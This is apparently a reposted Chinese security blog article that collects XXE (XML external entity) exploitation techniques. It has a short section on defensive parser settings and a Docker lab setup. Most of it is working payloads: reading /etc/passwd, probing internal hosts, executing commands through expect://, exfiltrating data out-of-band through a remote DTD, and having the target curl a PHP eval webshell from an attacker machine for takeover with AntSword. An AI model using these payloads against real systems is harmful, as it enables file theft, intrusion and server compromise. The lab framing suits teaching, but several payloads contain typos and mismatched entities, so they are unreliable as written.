XXE漏洞综合利用方法汇总

admin 2024年10月18日23:25:47评论22 views字数 3059阅读10分11秒阅读模式
XXE漏洞综合利用方法汇总

点击上方蓝字关注我们

郑重说明

XXE漏洞综合利用方法汇总
XXE漏洞综合利用方法汇总

    数字人才创研院秉承探究学习与交流知识‍‍‍的原则,所有发布的技术文章仅供参考,目的在于助力你获得更多知识;与此同时,让我们共同遵守《网络安全法》,未经授权请勿利用文章中的技术内容对任何计算机系统进行非授权操作,否则对他人或单位而造成的直接或间接后果或损失,均由使用者本人负责。

   公众号发表的文章如有涉及您的侵权,烦请私信联系告知,我们会立即删除并对您表达最诚挚的歉意!感谢您的理解!

Purpose of recommendation

XXE漏洞综合利用方法汇总

知识介绍

XXE漏洞综合利用方法汇总
XXE漏洞综合利用方法汇总
    XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,它发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起DOS攻击等危害。
    XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

XXE漏洞综合利用方法汇总

    ☆产生的主要原因包含如下:
    1.有外部实体,将数据传入服务器,而且传入的格式是XML。
<!DOCTYPE message[<!ENTITY ms SYSTEN “file:///home/demo.txt”>]
    2.服务器会将XML进行解析,解析后将内容呈现出来。
    3.最终显示数据的地方能够被获取。
    ☆主要防御措施包含如下:
    1.检查服务器是否必须对XML进行解析
    2.检查服务器是否必须将解析的内容加载到页面或数据库
    3.检查服务器是否对XML文件头检查
    4.使用语言推荐的禁用外部实体的方法
#PHP:libxml_disable_entity_loader(true);#Java:DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);.setFeature("http://xml.org/sax/features/external-general-entities",false);.setFeature("http://xml.org/sax/features/external-parameter-entities",false);#Python:from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False)
    接下来,让我们荡起双桨,优哉游哉,开启它的精彩之路吧!XXE漏洞综合利用方法汇总
XXE漏洞综合利用方法汇总
XXE漏洞综合利用方法汇总

01

搭建靶场 

第一步:准备一台Docker环境虚拟机,然后执行快速拉取镜像的命令。

docker pull registry.cn-hangzhou.aliyuncs.com/cnhongke/xxe***:latest## 获取完整命令,敬请关注公众号哦!

XXE漏洞综合利用方法汇总

第二步:执行如下语句,创建最新版容器。

docker run --restart=always -d -p 8080:80 registry.cn-hangzhou.aliyuncs.com/cnhongke/xxe***#映射端口需要结合实际情况自行设定docker ps -a

XXE漏洞综合利用方法汇总

    第三步:访问映射的IP或域名,如果显示如下图,即表明安装成功。

XXE漏洞综合利用方法汇总

第四步:关注下方公众号并回复:XXE,获得下拉镜像的地址。

    到此,我们完成了XXE靶场的部署;接下来,Getshell的利用正式开始。

XXE漏洞综合利用方法汇总

XXE漏洞综合利用方法汇总

02

★ 利用思路 

0X01 直接读取系统文件

    使用如下类似Payload进行读取系统敏感文件

<?xml version = "1.0"?><!DOCTYPE ANY [    <!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>

XXE漏洞综合利用方法汇总

    0X02 内网探针或攻击内网应用(触发漏洞地址)

    使用如下类似Payload获取内网系统敏感文件

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cnc [    <!ELEMENT cnc ANY >    <!ENTITY xxe SYSTEM "http://IP/index.txt" >]><x>&xxe;</x>#IP为内网地址或域名

    0X03 借助expect扩展执行系统命令

    (1)使用如下类似Payload获取系统敏感文件

<?xml version = "1.0"?><!DOCTYPE ANY [    <!ENTITY xxe SYSTEM "expect://id" >]><x>&xxe;</x>

XXE漏洞综合利用方法汇总

     (2)部署Web服务器,达到Getshell的方法。

首先,准备好poc.php,并写入一句话马,参考如下:

<?php echo('<?php eval($_POST[‘2023’]);?>');?>

     然后,利用XXE执行下载命令,参考如下:

<?xml version="1.0" version="UTF-8"?>        <!DOCTYPE title[        <!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'攻击机ip/poc.php'">        ]>        <config><title>&xxe;</title></config

XXE漏洞综合利用方法汇总

    最后,借助蚁剑连接即可。

XXE漏洞综合利用方法汇总

    0X04 引入外部实体 dtd命令

    使用如下类似Payload获取系统敏感文件

<?xml version="1.0" ?><!DOCTYPE test [    <!ENTITY % file SYSTEM "http://127.0.0.1:8080/xml.dtd">    %file;]><x>&xxe;</x>xml.dtd:<!ENTITY send SYSTEM "file:///etc/passwd">

    0X05 无回显–读取文件

    直接使用如下类似Payload获取敏感信息

<?xml version="1.0"?><!DOCTYPE test [    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">    <!ENTITY % dtd SYSTEM "http://远程:8081/test.dtd">    %dtd;    %xxe;]>

    0X06 协议-读文件(绕过)

    直接使用如下类似Payload获取敏感信息

<?xml version = "1.0"?>    <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]><x>&xxe;</x>

XXE漏洞综合利用方法汇总

XXE漏洞综合利用方法汇总XXE漏洞综合利用方法汇总XXE漏洞综合利用方法汇总

XXE漏洞综合利用方法汇总

如果喜欢,敬请关注哦,后期更精彩!

XXE漏洞综合利用方法汇总
XXE漏洞综合利用方法汇总
XXE漏洞综合利用方法汇总

往 期 推 荐 ·值 得 细 看

2023全网最优渗透研学靶场汇总(上)

2023-02-23

XXE漏洞综合利用方法汇总

PHPMyadmin的Getshell方法汇总

2023-07-01

XXE漏洞综合利用方法汇总

知识分享|Redis未授权访问漏洞汇集

2023-06-26

XXE漏洞综合利用方法汇总

ThinkPHP|送给渗透测试专家们的“福利”

2023-06-13

XXE漏洞综合利用方法汇总

一款趣味十足的【跨站漏洞靶场】

2023-03-22

XXE漏洞综合利用方法汇总

END

原文始发于微信公众号(数字人才创研院):XXE漏洞综合利用方法汇总

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月18日23:25:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XXE漏洞综合利用方法汇总https://cn-sec.com/archives/1876723.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息